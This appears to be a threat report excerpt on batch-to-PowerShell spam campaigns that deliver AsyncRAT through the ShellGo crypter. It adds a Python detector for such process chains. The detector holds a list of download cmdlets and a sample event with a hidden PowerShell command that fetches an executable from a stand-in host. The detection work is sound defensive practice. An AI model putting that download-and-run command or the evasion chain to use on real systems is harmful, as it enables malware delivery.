In the past few months, a flurry of malicious spam campaigns with a financial theme have been distributing malware via batch scripts (.bat). The campaigns use a wide range of programming languages along the infection chain, including batch scripts, PowerShell, Go, shellcode, and .NET, with each stage handling a different task. The infection begins with simple batch scripts that use PowerShell to download a second stage of malware from the internet.
To avoid detection, the malware is packed twice, including by ShellGo, a Go crypter that decrypts and runs shellcode in memory. The shellcode decrypts the payload, bypasses two Windows security measures, and then runs the payload in memory. In the campaign we examined below, the payload was AsyncRAT, a popular remote access trojan (RAT) written in .NET. Notably.
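As an added example (not code from the original report), the following Python detector flags process-creation events that match the first link of the chain described above: a .bat file run by cmd.exe that launches PowerShell with a download primitive to fetch a second stage. The event field names follow Sysmon-style process-creation records and the sample events are constructed for illustration.

```python
import re

# Cmdlets and .NET calls commonly used by one-liners that pull a payload from
# the internet. Any of these in a PowerShell child of a batch-running cmd.exe
# is the pattern this detector alerts on.
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|Invoke-RestMethod|Net\.WebClient)",
    re.IGNORECASE,
)

def is_suspicious(event: dict) -> bool:
    """True if cmd.exe running a .bat file spawned PowerShell whose command
    line contains a download primitive (the batch -> PowerShell -> second-stage
    step). Field names (ParentImage, ParentCommandLine, Image, CommandLine)
    are assumed to match Sysmon-style process-creation records."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    parent_cmd = event.get("ParentCommandLine", "").lower()
    cmd = event.get("CommandLine", "")
    if not parent.endswith("cmd.exe"):
        return False
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return False
    if ".bat" not in parent_cmd:
        return False
    return bool(DOWNLOAD_PATTERNS.search(cmd))

def find_hits(events: list) -> list:
    """Return the indices of events that match the chain."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]

# Constructed sample events: one benign batch job, one matching the chain,
# and one PowerShell download that was not launched from a batch file.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd.exe /c C:\scripts\backup.bat",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\copy.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'cmd.exe /c "C:\Users\user\Downloads\invoice.bat"',
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://EXAMPLE.invalid/s2','$env:TEMP\\a.exe')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest https://EXAMPLE.invalid/x"},
]

if __name__ == "__main__":
    print("suspicious event indices:", find_hits(SAMPLE_EVENTS))  # [1]
```

The third sample is deliberately left unflagged so the rule stays tied to the batch-file parent; a broader hunt for PowerShell downloads from any parent would drop the `.bat` check.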